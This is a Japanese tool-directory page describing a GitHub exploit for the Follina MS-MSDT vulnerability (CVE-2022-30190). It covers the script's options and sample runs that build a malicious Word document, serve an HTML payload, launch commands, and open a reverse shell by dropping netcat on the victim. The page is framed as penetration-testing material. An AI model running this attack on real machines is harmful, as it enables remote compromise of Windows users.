Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
FOLLINA-CVE-2022-30190 — FOLLINA-CVE-2022-30190 の実装 | Kitploit
ツール/GitHubGitHub/toxicenvelope/follina-cve-2022-30190
ペイロード生成エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミング
GitHubtoxicenvelope/follina-cve-2022-30190

FOLLINA-CVE-2022-30190

FOLLINA-CVE-2022-30190 の実装

リポジトリを見る
113年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

FOLLINA-CVE-2022-30190

FOLLINA-CVE-2022-30190 の実装


このリポジトリには、脆弱性 FOLLINA-CVE-2022-30190 の悪用ツールが含まれています。

免責事項

このツールは、セキュリティテストおよび研究目的で開発されました。 本ツールをクローン/フォークした場合、元の開発者は行為者の行動に対する一切の責任を負いません。


前提条件

  1. CVE-2022-30190 について こちら から読む
  2. テスト環境を準備する(Virtual Box + Vagrant を推奨)
  • VirtualBox を ここ からダウンロード
  • Vagrant を ここ からダウンロード
  • Vagrant CLI について こちら から読む

悪意のある Microsoft Word 文書を使用して "Follina" MS-MSDT 攻撃を作成し、HTTP サーバーでペイロードをステージングします。

使用方法

root@kitploit:~
usage: exploit.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]

options:
  -h, --help            show this help message and exit
  --command COMMAND
                        command to run on the target (default: calc)
  --output OUTPUT 
                        output maldoc file (default: ./follina.doc)
  --interface INTERFACE
                        network interface or IP address to host the HTTP server (default: eth0)
  --port PORT           
                        port to serve the HTTP server (default: 8000)

使用例

calc.exe を起動:

root@kitploit:~
$ python3 exploit.py   
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./cve202230190.doc
[+] serving html payload on :8000

cmd.exe を起動:

root@kitploit:~
$ python3 exploit.py --command "cmd"

ポート 9001 でリバースシェルを取得します。注意: これにより、被害マシンに netcat バイナリがダウンロードされ、C:\Windows\Tasks に配置されます。バイナリのクリーンアップは行われません。AV が無効でない限り、アンチウイルス検出がトリガーされます。

root@kitploit:~
$ python3 exploit.py --reverse 9001
ツールをダウンロード